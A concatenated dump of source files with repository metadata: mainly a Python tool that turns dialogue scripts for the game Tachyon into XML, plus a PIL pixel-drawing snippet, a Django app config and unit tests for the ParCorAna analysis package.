    # An NPC spawn plus its AI behaviours.
    def __init__(self, params):
        self.params = params
        self.ais = []

class ParsedShip:
    # A ship plus its AI behaviours and on-board NPC spawns.
    def __init__(self, params):
        self.params = params
        self.ais = []
        self.npcs = []

class ParseError(Exception):
    """Raised if an error occurs during section parsing"""
    def __init__(self, msg, pos, section):
        self.msg = msg
        self.pos = pos
        self.section = section
        # (pos, section) pairs added while unwinding nested sections;
        # a string pos marks the owning dialogue name.
        self.parents = []
# Immutable flattened forms handed to the XML emitters.
FlatMessage = namedtuple('FlatMessage', 'id text replies events')
FlatReply = namedtuple('FlatReply', 'id target text conditions params')
def auto(value, auto_value):
    """Return *auto_value* when *value* is the Auto sentinel, else *value*."""
    if value is Auto:
        return auto_value
    return value
def parse_reply(pos, section):
    """Parse reply modifiers from the start of a subsection.

    Consumes Reply/Condition/End/Goto directives starting at *pos* and
    returns ``(new_pos, ParsedReply)``. Raises ParseError if two Reply
    directives both carry text ("chained").
    """
    reply = ParsedReply(Auto, Auto, {})
    while pos < len(section):
        mod = section[pos]
        if type(mod) is Reply:
            if mod.text is not None:
                if reply.text is not Auto:
                    raise ParseError("Reply cannot be chained", pos, section)
                reply.text = mod.text
            # Params accumulate even from text-less Reply directives.
            reply.params.update(mod.params)
        elif type(mod) is Condition:
            reply.conditions.append(mod)
        elif mod is End:
            # End severs the reply: no next message.
            reply.target = None
        elif type(mod) is Goto:
            reply.target = mod.target
        else:
            # First non-modifier item ends the reply header.
            break
        pos += 1
    return pos, reply
def parse_debris(pos, section):
    """Parse a debris node with its items.

    Consumes the AddDebris at *pos* plus any following Item directives;
    returns ``(new_pos, ParsedDebri)``.
    """
    if type(section[pos]) is not AddDebris:
        raise TypeError(f"parse_debris called on {section[pos]}")
    debris = ParsedDebri(section[pos].params)
    pos += 1
    while pos < len(section):
        item = section[pos]
        if type(item) is Item:
            debris.items.append(item)
        else:
            break
        pos += 1
    return pos, debris
def parse_ai(pos, section):
    """Parse an AI node with its conditions.

    Consumes the Ai at *pos* plus any following Condition directives;
    returns ``(new_pos, ParsedAi)``.
    """
    if type(section[pos]) is not Ai:
        raise TypeError(f"parse_ai called on {section[pos]}")
    ai = ParsedAi(section[pos].type, section[pos].params)
    pos += 1
    while pos < len(section):
        item = section[pos]
        if type(item) is Condition:
            ai.conditions.append(item)
        else:
            break
        pos += 1
    return pos, ai
def parse_npc(pos, section):
    """Parse an NPC node with its AIs.

    Consumes the SpawnNPC at *pos* plus any following Ai sub-blocks;
    returns ``(new_pos, ParsedNPC)``.
    """
    if type(section[pos]) is not SpawnNPC:
        raise TypeError(f"parse_npc called on {section[pos]}")
    npc = ParsedNPC(section[pos].params)
    pos += 1
    while pos < len(section):
        item = section[pos]
        if type(item) is Ai:
            # parse_ai advances pos past the whole Ai block.
            pos, ai = parse_ai(pos, section)
            npc.ais.append(ai)
            continue
        else:
            break
        pos += 1
    return pos, npc
def parse_ship(pos, section):
    """Parse a ship with its AIs and NPCs.

    Consumes the AddShip at *pos* plus any following Ai or SpawnNPC
    sub-blocks; returns ``(new_pos, ParsedShip)``.
    """
    if type(section[pos]) is not AddShip:
        raise TypeError(f"parse_ship called on {section[pos]}")
    ship = ParsedShip(section[pos].params)
    pos += 1
    while pos < len(section):
        item = section[pos]
        if type(item) is Ai:
            # Sub-parsers advance pos past their whole block.
            pos, ai = parse_ai(pos, section)
            ship.ais.append(ai)
            continue
        elif type(item) is SpawnNPC:
            pos, npc = parse_npc(pos, section)
            ship.npcs.append(npc)
            continue
        else:
            break
        pos += 1
    return pos, ship
def parse_event(pos, section):
    """Parse an event with its conditions, npcs, ships and debris.

    Accepts either an InlineEvent (carries a target; a missing name becomes
    the Auto sentinel so assign_ids can fill it) or an EventDef at *pos*.
    Returns ``(new_pos, ParsedEvent)``.
    """
    item = section[pos]
    if type(item) is InlineEvent:
        event = ParsedEvent(item.type, item.name, item.params)
        event.target = item.target
        if event.name is None:
            event.name = Auto
    elif type(item) is EventDef:
        event = ParsedEvent(item.type, item.name, item.params)
    else:
        raise TypeError(f"parse_event called on {item}")
    pos += 1
    while pos < len(section):
        item = section[pos]
        if type(item) is Condition:
            event.conditions.append(item)
        elif type(item) is SpawnNPC:
            # Sub-parsers advance pos past their whole block.
            pos, npc = parse_npc(pos, section)
            event.npcs.append(npc)
            continue
        elif type(item) is AddDebris:
            pos, debris = parse_debris(pos, section)
            event.debris.append(debris)
            continue
        elif type(item) is AddShip:
            pos, ship = parse_ship(pos, section)
            event.ships.append(ship)
            continue
        else:
            break
        pos += 1
    return pos, event
def parse_events(section):
    """Parse a section consisting solely of EventDef blocks.

    Returns the list of ParsedEvent objects; raises ParseError on any
    item that is not part of an EventDef block.
    """
    pos = 0
    events = []
    while pos < len(section):
        item = section[pos]
        if type(item) is EventDef:
            # parse_event always advances pos, so the loop terminates.
            pos, event = parse_event(pos, section)
            events.append(event)
        else:
            msg = f"Unkown item type {item.__class__.__name__}"
            raise ParseError(msg, pos, section)
    return events
def parse_message(pos, section):
    """Parse one message (optionally labelled) with its trailing modifiers.

    A message is either a plain string or a Choice; an optional Label
    before it fixes its id. Trailing End/Goto/Event/Reply/InlineEvent
    directives modify the message. Returns ``(new_pos, ParsedMessage)``.
    """
    mid = Auto
    if type(section[pos]) is Label:
        if pos == len(section):
            msg = "Label is not allowed at the end of a section"
            raise ParseError(msg, pos, section)
        mid = section[pos].id
        pos += 1
    if type(section[pos]) is str:
        message = ParsedMessage(mid, section[pos])
        pos += 1
    elif type(section[pos]) is Choice:
        choices = []
        for content in section[pos].choices:
            try:
                # Each choice subsection starts with reply modifiers,
                # followed by a nested dialogue.
                subpos, reply = parse_reply(0, content)
                _, subsection = parse_dialogue(subpos, content)
            except ParseError as err:
                # Record the enclosing position so errors can be traced.
                err.parents.append((pos, section))
                raise err
            except Exception as exc:
                msg = (
                    f"Exception while parsing this section:"
                    f" {exc.__class__.__name__}: {exc}"
                )
                raise ParseError(msg, pos, section)
            else:
                choices.append((reply, subsection))
        message = ParsedMessage(mid, section[pos].text)
        message.choices.extend(choices)
        pos += 1
    elif mid is not Auto:
        msg = f"{section[pos].__class__.__name__} is not allowed after a Label"
        raise ParseError(msg, pos, section)
    else:
        raise TypeError(f"parse_message called on {section[pos]}")
    while pos < len(section):
        item = section[pos]
        if item is End:
            message.next = None
        elif type(item) is Goto:
            message.next = item.target
        elif type(item) is Event:
            message.events.append(item)
        elif type(item) is Reply:
            if item.params:
                msg = "Reply not part of choice can't have params"
                raise ParseError(msg, pos, section)
            if message.response is not Auto:
                raise ParseError("Reply cannot be chained", pos, section)
            message.response = item.text
        elif type(item) is InlineEvent:
            # parse_event advances pos past the whole inline block.
            pos, event = parse_event(pos, section)
            message.events.append(event)
            continue
        else:
            break
        pos += 1
    return pos, message
def parse_dialogue(pos, section):
    """Parse a section into a list of ParsedMessage objects.

    Returns ``(new_pos, dialogue)``. Raises ParseError for message
    modifiers appearing outside a message, and for a tuple accidentally
    passed where a list-like section was expected (a common typo:
    a one-element tuple missing its comma).
    """
    if isinstance(section, tuple):
        msg = f"Expected section but got tuple, content: {section}"
        raise ParseError(msg, pos, None)
    dialogue = []
    while pos < len(section):
        item = section[pos]
        if type(item) in [Label, Choice, str]:
            # parse_message consumes the message and its modifiers.
            pos, message = parse_message(pos, section)
            dialogue.append(message)
            continue
        elif type(item) in [Condition, EndType, Goto, Event, Reply]:
            msg = f"{item.__class__.__name__} is not allowed here"
            raise ParseError(msg, pos, section)
        else:
            msg = f"Unkown item type {item.__class__.__name__}"
            raise ParseError(msg, pos, section)
        pos += 1
    return pos, dialogue
def assign_ids(section, mid_gen, ename_gen):
    """Assign ids to messages, replies and events whose id is Auto.

    *mid_gen* and *ename_gen* are shared generators so ids stay unique
    across nested subsections; reply ids restart at R1 per message.
    """
    for item in section:
        if item.id is Auto:
            item.id = next(mid_gen)
        for event in item.events:
            if type(event) is ParsedEvent and event.name is Auto:
                event.name = next(ename_gen)
        # If there are more than 9 choices, R10 would sort before R2,
        # so zero-pad the reply ids in that case.
        if len(item.choices) > 9:
            rid_gen = map("R{:02}".format, count(1))
        else:
            rid_gen = map("R{}".format, count(1))
        for reply, sub in item.choices:
            if reply.id is Auto:
                reply.id = next(rid_gen)
            assign_ids(sub, mid_gen, ename_gen)
def resolve(section, end=None):
    """Resolve next/target/reply-text references that are still Auto.

    A message's implicit next is the following message in its section, or
    *end* (the parent's continuation) for the last one. A choice's target
    defaults to its subsection's first message, falling back to the
    message's own next; its text falls back to the message's response.
    """
    for i, item in enumerate(section):
        if item.next is Auto:
            item.next = section[i+1].id if i+1 < len(section) else end
        for reply, sub in item.choices:
            if reply.target is Auto:
                reply.target = sub[0].id if sub else item.next
            if reply.text is Auto:
                reply.text = item.response
            resolve(sub, end=item.next)
def separate_events(message):
    """Split a message's events into call references and inline definitions.

    Plain Event tuples pass straight through as calls; each ParsedEvent
    is recorded as a definition and additionally referenced through a
    synthesized Event call so the message still triggers it.
    """
    call_list, definition_list = [], []
    for entry in message.events:
        if type(entry) is Event:
            call_list.append(entry)
        elif type(entry) is ParsedEvent:
            call_list.append(Event(entry.name, entry.target))
            definition_list.append(entry)
        else:
            assert False, "Should not be possible"
    return call_list, definition_list
def flatten(section):
    """Create a flat representation of a processed section.

    Returns ``(messages, events)`` where *messages* is a depth-first list
    of FlatMessage and *events* collects every inline event definition.
    Messages without explicit choices get a single implicit R1 reply
    unless they neither set a response nor continue anywhere.
    """
    output = []
    events = []
    for item in section:
        assert type(item) is ParsedMessage, "Should not be possible"
        event_calls, event_defs = separate_events(item)
        events.extend(event_defs)
        replies = []
        sub_outputs = []
        if item.choices:
            for reply, sub in item.choices:
                replies.append(FlatReply(
                    reply.id, reply.target, reply.text,
                    reply.conditions, reply.params
                ))
                # Subsection messages are appended after this message.
                sub_output, sub_defs = flatten(sub)
                sub_outputs.extend(sub_output)
                events.extend(sub_defs)
        elif item.response is not Auto or item.next is not None:
            replies.append(FlatReply('R1', item.next, item.response, [], {}))
        output.append(FlatMessage(item.id, item.text, replies, event_calls))
        output.extend(sub_outputs)
    return output, events
# Condition types subject to the present/absent mangling in xml_conditions;
# index 0 and 1 are each other's logical complement.
SERVER_VAR_TYPES = [
    "SERVER_VARIABLE_PRESENT",
    "SERVER_VARIABLE_ABSENT",
]
def xml_params(node, param_node_name, params):
    """Write *params* onto *node*, allowing repeated keys.

    Scalar values become attributes on *node* itself (ints coerced to
    str). List values become one child *param_node_name* element per
    entry, each carrying the key as its single attribute — XML attributes
    cannot repeat, child elements can.
    """
    for name, raw in params.items():
        if type(raw) is not list:
            node.set(name, str(raw) if type(raw) is int else raw)
            continue
        for entry in raw:
            if type(entry) is int:
                entry = str(entry)
            SubElement(node, param_node_name, {name: entry})
def xml_conditions(node, node_name, conditions, options):
    """Add xml condition and condition_param nodes from a condition list.

    Server-variable conditions are optionally rewritten first:
    ``mangle_any_value`` turns an any_value check into var_value='1';
    ``mangle_empty_value`` flips PRESENT/ABSENT when no value is given.
    """
    for condition in conditions:
        if condition.type in SERVER_VAR_TYPES:
            if (
                options['mangle_any_value']
                and 'any_value' in condition.params
                and 'var_value' not in condition.params
            ):
                condition.params['var_value'] = '1'
            if (
                options['mangle_empty_value']
                and 'any_value' not in condition.params
                and 'var_value' not in condition.params
            ):
                # Swap to the complementary type (index 0 <-> 1).
                index = 1 - SERVER_VAR_TYPES.index(condition.type)
                condition = condition._replace(type=SERVER_VAR_TYPES[index])
        condition_node = SubElement(node, node_name, type=condition.type)
        xml_params(condition_node, 'condition_param', condition.params)
def xml_messages(node, messages, options):
    """Add xml message nodes to a dialogue node from a flat message list.

    Reply text that is still Auto falls back to options['default_response'];
    a reply with target None (End) gets no 'next' attribute.
    """
    for msg in messages:
        msg_node = SubElement(node, 'message', id=msg.id, text=msg.text)
        for event in msg.events:
            SubElement(msg_node, 'event', id=event.id, target=event.target)
        for reply in msg.replies:
            text = auto(reply.text, options['default_response'])
            reply_node = SubElement(msg_node, 'reply', id=reply.id, text=text)
            if reply.target is not None:
                reply_node.set('next', reply.target)
            for key, value in reply.params.items():
                if type(value) is int:
                    value = str(value)
                reply_node.set(key, value)
            xml_conditions(reply_node, 'condition', reply.conditions, options)
def xml_dialogues(dialogues, options):
    """Create a <dialogues> element tree from a diagen dialogue mapping.

    Runs the full pipeline per dialogue (parse, id assignment, reference
    resolution, flattening) and returns ``(dialogues_node, extra_events)``
    where *extra_events* holds every inline event definition encountered.
    Message ids are unique across all dialogues; event names are prefixed
    with the dialogue name.
    """
    mid_gen = map("M{}".format, count())
    dialogues_node = Element('dialogues')
    extra_events = []
    for name, section in dialogues.items():
        ename_gen = map(f"{name}_E{{}}".format, count())
        try:
            _, section = parse_dialogue(0, section)
        except ParseError as err:
            # Tag the error with the dialogue it came from.
            err.parents.append((name, None))
            raise err
        assign_ids(section, mid_gen, ename_gen)
        resolve(section)
        messages, events = flatten(section)
        if not messages:
            raise ValueError(f"'{name}' has no messages")
        extra_events.extend(events)
        dialogue_node = SubElement(dialogues_node, 'dialogue', name=name)
        start_node = SubElement(dialogue_node, 'start')
        start_node.text = messages[0].id
        xml_messages(dialogue_node, messages, options)
    return dialogues_node, extra_events
def xml_ai(node, prefix, ais, options):
    """Append one <*prefix*> element per AI, with its params and conditions.

    Child names are derived from *prefix*: list-valued parameters become
    ``<prefix>_param`` children and conditions ``<prefix>_conditions``.
    """
    for behaviour in ais:
        behaviour_node = SubElement(node, f'{prefix}', type=behaviour.type)
        xml_params(behaviour_node, f'{prefix}_param', behaviour.params)
        xml_conditions(
            behaviour_node, f'{prefix}_conditions',
            behaviour.conditions, options,
        )
def xml_npcs(node, node_name, npcs, options):
    """Append one *node_name* element per NPC spawn.

    NPC parameter keys are prefixed with ``npc_`` before being written;
    each spawn's AIs are emitted as ``npc_ai`` children.
    """
    for spawn in npcs:
        spawn_node = SubElement(node, node_name)
        prefixed = {}
        for key, value in spawn.params.items():
            prefixed[f'npc_{key}'] = value
        xml_params(spawn_node, 'npc_param', prefixed)
        xml_ai(spawn_node, 'npc_ai', spawn.ais, options)
def xml_events(events, options):
    """Create an <events> element with ships, npcs and debris per event."""
    events_node = Element('events')
    for event in events:
        event_node = SubElement(
            events_node, 'event', type=event.type, name=event.name
        )
        xml_params(event_node, 'event_param', event.params)
        xml_conditions(event_node, 'condition', event.conditions, options)
        xml_npcs(event_node, 'spawn_npc', event.npcs, options)
        for ship in event.ships:
            ship_node = SubElement(event_node, 'add_ship')
            xml_params(ship_node, 'ship_param', ship.params)
            xml_ai(ship_node, 'ship_ai', ship.ais, options)
            # NPCs attached to a ship use a distinct element name.
            xml_npcs(ship_node, 'spawn_npc_on_ship', ship.npcs, options)
        for debris in event.debris:
            debris_node = SubElement(event_node, 'add_debris')
            xml_params(debris_node, 'debris_param', debris.params)
            for item in debris.items:
                item_node = SubElement(debris_node, 'debris_item')
                xml_params(item_node, 'debris_item_param', item.params)
    return events_node
def debug_format(item, indent=0):
    """Format a pretty, recursive representation of a processed section.

    Handles ParsedMessage/ParsedReply specially, recurses into lists and
    tuples with 4-space indent steps, and falls back to repr() for
    everything else.
    """
    if type(item) is ParsedMessage:
        return "\n".join([
            f"{' '*indent}<ParsedMessage id={item.id!r} text={item.text!r}"
            f" next={item.next!r} response={item.response!r}"
            f" events={item.events} choices=["
        ] + [debug_format(c, indent+4) + ',' for c in item.choices] + [
            f"{' '*indent}]>"
        ])
    if type(item) is ParsedReply:
        return (
            f"{' '*indent}<ParsedReply id={item.id!r} target={item.target!r}"
            f" text={item.text!r} conditions={item.conditions}"
            f" params={item.params}>"
        )
    if type(item) is list:
        return "\n".join([
            f"{' '*indent}[",
        ] + [debug_format(sub, indent+4) + ',' for sub in item] + [
            f"{' '*indent}]"
        ])
    if type(item) is tuple:
        return "\n".join([
            f"{' '*indent}(",
        ] + [debug_format(sub, indent+4) + ',' for sub in item] + [
            f"{' '*indent})"
        ])
    return ' ' * indent + repr(item)
def format_pos(pos, section):
    """Render the last items leading up to *pos*, marking *pos* with '>'.

    Shows at most the two preceding entries plus the flagged one; Choice
    entries are abbreviated so their subsections don't flood the output.
    A None section (position unknown) yields a one-line placeholder.
    """
    if section is None:
        return f">{pos:3}: Unkown"
    rendered = []
    first = max(pos - 2, 0)
    for index in range(first, pos + 1):
        entry = section[index]
        if type(entry) is Choice:
            shown = f"Choice({entry.text!r}, ...)"
        else:
            shown = repr(entry)
        marker = '>' if index == pos else ' '
        rendered.append(f"{marker}{index:3}: {shown}")
    return "\n".join(rendered)
def format_parse_error(err):
    """Build a traceback-like, outermost-first description of a ParseError."""
    context = []
    # err.parents was appended innermost-first while unwinding, so each
    # parent is pushed in front of the lines collected so far.
    for pos, section in err.parents:
        if type(pos) is int:
            context = [format_pos(pos, section), "in subsection"] + context
        else:
            context = [f"in dialogue '{pos}'"] + context
    body = context + [format_pos(err.pos, err.section)]
    body.append(f"ParseError: {err.msg}")
    return "\n".join(body)
def xml_pretty(node, indent=0):
    """Indent and spread compact node representations over multiple lines."""
    child_count = len(node)
    if not child_count:
        # leaf nodes keep their one-line form
        return
    # newline + one extra level of indent before the first child
    node.text = "\n" + ' ' * (indent + 1) + (node.text or "")
    for i, child in enumerate(node):
        # siblings are indented one level deeper; the last child's tail
        # lines up with this node's closing tag
        deeper = 1 if i < child_count - 1 else 0
        child.tail = "\n" + ' ' * (indent + deeper) + (child.tail or "")
        xml_pretty(child, indent + 1)
def main():
    """Parse command line arguments and do dialogue generation."""
    from argparse import ArgumentParser
    from pathlib import Path
    import sys
    def error(message, code=1):
        """Print message to stderr and exit with code"""
        print(message, file=sys.stderr)
        exit(code)
    def handle_open(path, out):
        """Opens path as output if out otherwise as input"""
        # "-" selects the standard streams instead of a file
        if path == "-":
            return sys.stdout if out else sys.stdin
        try:
            # 'x' (exclusive create) prevents clobbering an existing output file
            return open(path, 'x' if out else 'r')
        except OSError as err:
            error(f"Error opening {path}: {err}")
    # defaults that a script may override via its diagen_options variable
    options = {
        'default_response': "[SKIP]...",
        'mangle_any_value': False,
        'mangle_empty_value': True,
    }
    parser = ArgumentParser(description="Generate Tachyion dialogue XML")
    parser.add_argument(
        'script', help="Script file containing the dialogues definition"
    )
    parser.add_argument(
        'output', nargs='?', default=None,
        help="Output file, defaults to script name with an xml extension"
    )
    parser.add_argument(
        'events', nargs='?', default=None,
        help="Events file, defaults to script name + _events with an xml"
        " extension"
    )
    args = parser.parse_args()
    # derive default output paths from the script name when not given
    if args.output is None:
        args.output = Path(args.script).with_suffix('.xml')
    if args.events is None:
        args.events = Path(args.script)
        args.events = args.events.with_name(f'{args.events.stem}_events.xml')
    in_file = handle_open(args.script, False)
    out_file = handle_open(args.output, True)
    # expose only this module's public API (__all__) to the user script,
    # then execute the script to collect its dialogue definitions
    script_vars = {k: v for k, v in globals().items() if k in __all__}
    exec(in_file.read(), script_vars)
    if 'dialogues' not in script_vars:
        error(f"Script does not set the dialogues variable", 2)
    dialogues = script_vars['dialogues']
    events = script_vars.get('events', [])
    options.update(script_vars.get('diagen_options', {}))
    try:
        root, extra_events = xml_dialogues(dialogues, options)
    except ParseError as err:
        error(format_parse_error(err))
    root.insert(0, Comment(" Generated by diagen.py "))
    xml_pretty(root)
    root.tail = "\n"
    document = ElementTree(root)
    document.write(out_file, encoding="unicode", xml_declaration=True)
    # only emit the events file when there is something to write
    if events or extra_events:
        try:
            events = parse_events(events)
        except ParseError as err:
            msg = format_parse_error(err)
            error("\n".join(["in events section", msg]))
        events.extend(extra_events)
        event_file = handle_open(args.events, True)
        event_root = xml_events(events, options)
        event_root.insert(0, Comment(" Generated by diagen.py "))
        xml_pretty(event_root)
        event_root.tail = "\n"
        event_document = ElementTree(event_root)
        event_document.write(
            event_file, encoding="unicode", xml_declaration=True
        )
if __name__ == '__main__':
    # allow the module to be run directly as a command-line tool
    main()
| [
"noreply@github.com"
] | noreply@github.com |
cb95a5fcb3ae98cc0e7079624eee3ff7610c7d5d | e1471e31e13460912f1e65528e996120c1bcde49 | /draw-pixel/draw-pixel.py | ce7c152fdd2fcd655ca056bd00204e2fe929a4c9 | [] | no_license | Kranthos/PIL-python | db0dd8b317a2f67cc61e4ebdb16348777a0d995a | 6dd15c22ba64ae59cf258d20e8273ce05f690cd6 | refs/heads/main | 2023-06-02T09:43:28.414111 | 2021-06-21T14:43:26 | 2021-06-21T14:43:26 | 376,350,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from PIL import Image
# Create a 50x50 opaque white RGBA canvas, mark its center pixel black,
# preview it in the default image viewer, then write it to disk.
canvas = Image.new(mode="RGBA", size=(50, 50), color=(255, 255, 255, 255))
canvas.putpixel((25, 25), (0, 0, 0, 255))
canvas.show()
canvas.save("pixel.png")
"ekranthos@gmail.com"
] | ekranthos@gmail.com |
058258ee3d0ec5cbba5e415fadbcea87d45b8a9d | a1c6fea0703d7d813a88aae91a7fbb17e06785ea | /third_admin/apps.py | daa061129e27bc5023c0d553c5287f0a2b872cb2 | [] | no_license | warm200/SpokesTribe | bea676b2868272ceab17176d7eb5d98ae7747543 | 8c3671214e317987645aeef4451e590bcb772f7e | refs/heads/master | 2022-01-11T18:12:40.847007 | 2019-02-08T13:08:38 | 2019-02-08T13:08:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | from django.apps import AppConfig
class ThirdAdminConfig(AppConfig):
    # Registers the third_admin app with Django; 'name' is the app's
    # dotted module path used in INSTALLED_APPS.
    name = 'third_admin'
| [
"zhengyufei19999@163.com"
] | zhengyufei19999@163.com |
525eb46142e733dea7a957256215fb27fe14dbe9 | 786de89be635eb21295070a6a3452f3a7fe6712c | /ParCorAna/tags/V00-00-08/src/unitTestsParCorAna.py | 2f089c31ef0f1ccbdfde74ff8e947a820923c7ba | [] | no_license | connectthefuture/psdmrepo | 85267cfe8d54564f99e17035efe931077c8f7a37 | f32870a987a7493e7bf0f0a5c1712a5a030ef199 | refs/heads/master | 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,144 | py | #--------------------------------------------------------------------------
# Description:
# Test script for ParCorAna
#
#------------------------------------------------------------------------
#--------------------------------
# Imports of standard modules --
#--------------------------------
import sys
import os
import logging
#import stat
import tempfile
import unittest
from cStringIO import StringIO
#import subprocess as sb
#import collections
#import math
import numpy as np
import h5py
import glob
import shutil
#-----------------------------
# Imports for other modules --
#-----------------------------
import psana
from AppUtils.AppDataPath import AppDataPath
import psana_test.psanaTestLib as ptl
#import h5py
#import psana_test.psanaTestLib as ptl
import ParCorAna as corAna
### helper function
def runCmd(cmd, verbose=True):
o,e,retcode = ptl.cmdTimeOutWithReturnCode(cmd)
if verbose: print "--- ran cmd: %s" % cmd
if verbose: print "output=%s\n\nerror=%s" % (o,e)
if verbose: print "return code=%r" % retcode
return retcode
def removeAllInProgressFromParentDir(fname):
    """Delete every *.inprogress file in the directory containing *fname*."""
    parent = os.path.dirname(fname)
    # the caller must pass a path with an existing parent directory
    assert len(parent) > 0 and os.path.exists(parent)
    for leftover in glob.glob(os.path.join(parent, "*.inprogress")):
        os.unlink(leftover)
def unindent(x):
    """Strip the common leading-space indent from every line of *x*.

    The indent is the minimum number of leading spaces found on the
    non-blank lines; blank (whitespace-only) lines are ignored when
    measuring but kept in the output.  Returns *x* unchanged when it
    contains no non-blank lines (the original raised ValueError from
    min() on an empty sequence in that case).
    """
    lns = x.split('\n')
    # leading-space count per non-blank line (counts only ' ' characters)
    allLeadingSpaces = [len(ln) - len(ln.lstrip(' '))
                        for ln in lns if len(ln.strip()) > 0]
    if not allLeadingSpaces:
        # empty or all-blank input: nothing to measure, nothing to strip
        return x
    minLeadingSpaces = min(allLeadingSpaces)
    return '\n'.join(ln[minLeadingSpaces:] for ln in lns)
class FormatFileName( unittest.TestCase ) :
    '''Tests for corAna.formatFileName's %T (timestamp) and %C (counter)
    filename substitution, using a throw-away directory under the package
    data area.
    '''
    def setUp(self) :
        """
        Method called to prepare the test fixture. This is called immediately
        before calling the test method; any exception raised by this method
        will be considered an error rather than a test failure.
        """
        self.longMessage = True
        destDirBase = AppDataPath(os.path.join("ParCorAna","testingDir")).path()
        self.tempDestDir = tempfile.mkdtemp(dir=destDirBase)
    def tearDown(self) :
        """
        Method called immediately after the test method has been called and
        the result recorded. This is called even if the test method raised
        an exception, so the implementation in subclasses may need to be
        particularly careful about checking internal state. Any exception raised
        by this method will be considered an error rather than a test failure.
        This method will only be called if the setUp() succeeds, regardless
        of the outcome of the test method.
        """
        shutil.rmtree(self.tempDestDir, ignore_errors=True)
    def test_formatFileName(self):
        # a plain name (no % pattern) must come back unchanged
        fname = os.path.join(self.tempDestDir, "file.h5")
        fname_w_T = os.path.join(self.tempDestDir, "file_%T.h5")
        fname_w_C = os.path.join(self.tempDestDir, "file_%C.h5")
        fname_other = os.path.join(self.tempDestDir, "file_jnk.h5")
        self.assertEqual(corAna.formatFileName(fname),fname)
        # %T expands to a YYYYMMDDhhmmss timestamp (14 chars replacing 2)
        tmfname = corAna.formatFileName(fname_w_T)
        os.system('touch %s' % tmfname)
        self.assertNotEqual(tmfname,fname)
        # %C               2015 05 05 16 19 59
        self.assertEqual(len(tmfname),len(fname_w_T)-2 +4 +2 +2 +2 +2 +2, msg="tmfname=%s" % tmfname)
        os.system('touch %s' % fname)
        os.system('touch %s' % tmfname)
        # %C expands to the next unused 3-digit counter; each touch below
        # consumes the value just returned, so the counter must advance
        c0 = corAna.formatFileName(fname_w_C)
        self.assertNotEqual(c0,fname)
        self.assertEqual(c0, fname_w_C.replace('%C','000'))
        os.system('touch %s' % c0)
        c1 = corAna.formatFileName(fname_w_C)
        self.assertEqual(c1, fname_w_C.replace('%C','001'))
        os.system('touch %s' % c1)
        # an unrelated file in the directory must not confuse the counter
        os.system('touch %s' % fname_other)
        c2 = corAna.formatFileName(fname_w_C)
        self.assertEqual(c2, fname_w_C.replace('%C','002'))
class ParCorAna( unittest.TestCase ) :
    '''Unit tests for small self-contained pieces of the ParCorAna package:
    dataset-string parsing, framework construction errors, and logger setup.
    '''
    def setUp(self) :
        """
        Method called to prepare the test fixture. This is called immediately
        before calling the test method; any exception raised by this method
        will be considered an error rather than a test failure.
        """
        self.longMessage = True
    def tearDown(self) :
        """
        Method called immediately after the test method has been called and
        the result recorded. This is called even if the test method raised
        an exception, so the implementation in subclasses may need to be
        particularly careful about checking internal state. Any exception raised
        by this method will be considered an error rather than a test failure.
        This method will only be called if the setUp() succeeds, regardless
        of the outcome of the test method.
        """
        pass
    def test_parseDataSetString(self):
        '''test parseDataSetString function
        '''
        # a minimal exp=...:run=... string should yield xtc defaults
        dsOpts = corAna.parseDataSetString('exp=amo123:run=12')
        self.assertEqual(dsOpts['exp'],'amo123')
        self.assertEqual(dsOpts['run'],[12])
        self.assertEqual(dsOpts['h5'],False)
        self.assertEqual(dsOpts['xtc'],True)
        self.assertEqual(dsOpts['live'],False)
        self.assertEqual(dsOpts['shmem'],False)
    def test_noConfig(self):
        # empty config dicts must be rejected at construction time
        system_params = {}
        user_params = {}
        test_alt = False
        self.assertRaises(AssertionError, corAna.CommSystemFramework, system_params, user_params, test_alt)
    def test_logger(self):
        msg1 = 'hi there'
        msg2 = 'what?'
        # capture stdout/stderr so the logger's handler target can be checked;
        # the originals are restored on any failure before re-raising
        try:
            stdout = sys.stdout
            stderr = sys.stderr
            sys.stdout = StringIO()
            sys.stderr = StringIO()
            # asking for both stdout and stderr handlers is an error
            self.assertRaises(AssertionError, corAna.makeLogger, False, True, True, True, 0, 'INFO', False)
            l = corAna.makeLogger( False, True, False, False, 0, 'INFO', False)
            l2 = corAna.makeLogger( False, True, False, False, 0, 'INFO', False) # make sure getting another ref doesn't double handlers
            l.info(msg1)
            l.warning(msg2)
        except Exception,e:
            sys.stdout = stdout
            sys.stderr = stderr
            raise e
        # only non-blank lines count; everything should go to stderr only
        stderrLns = [ln for ln in sys.stderr.getvalue().split('\n') if len(ln.strip())>0]
        stdoutLns = [ln for ln in sys.stdout.getvalue().split('\n') if len(ln.strip())>0]
        sys.stderr.close()
        sys.stdout.close()
        sys.stdout = stdout
        sys.stderr = stderr
        self.assertEqual(len(stderrLns),2)
        self.assertEqual(len(stdoutLns),0)
        self.assertTrue(stderrLns[0].find('INFO')>0 and stderrLns[0].find(msg1)>0, msg='log ln=%s does not have INFO nor %s in it' % (stderrLns[0], msg1))
        self.assertTrue(stderrLns[1].find('WARNING')>0 and stderrLns[1].find(msg2)>0, msg='log ln=%s does not have WARNING nor %s in it' % (stderrLns[1], msg2))
class Cspad2x2( unittest.TestCase ) :
'''Test on small cspad2x2
'''
def setUp(self) :
"""
Method called to prepare the test fixture. This is called immediately
before calling the test method; any exception raised by this method
will be considered an error rather than a test failure.
"""
pass
dataDir = os.path.join(ptl.getMultiFileDataDir(), 'test_013_xcsi0314')
experiment = 'xcsi0314'
run = 178
maskColorDir = os.path.join(dataDir, 'maskColorDir')
maskFileBaseName = '%s-r%d_XcsEndstation_0_Cspad2x2_0_mask_ndarrCoords.npy' % (experiment, run)
testMaskFileBaseName = '%s-r%d_XcsEndstation_0_Cspad2x2_0_testmask_ndarrCoords.npy' % (experiment, run)
colorFileBaseName = '%s-r%d_XcsEndstation_0_Cspad2x2_0_color_ndarrCoords.npy' % (experiment, run)
maskFile = os.path.join(maskColorDir, maskFileBaseName)
testMaskFile = os.path.join(maskColorDir, testMaskFileBaseName)
colorFile = os.path.join(maskColorDir, colorFileBaseName)
assert os.path.exists(maskFile), "mask file %s doesn't exist" % maskFile
assert os.path.exists(testMaskFile), "test maskfile %s doesn't exist" % testMaskFile
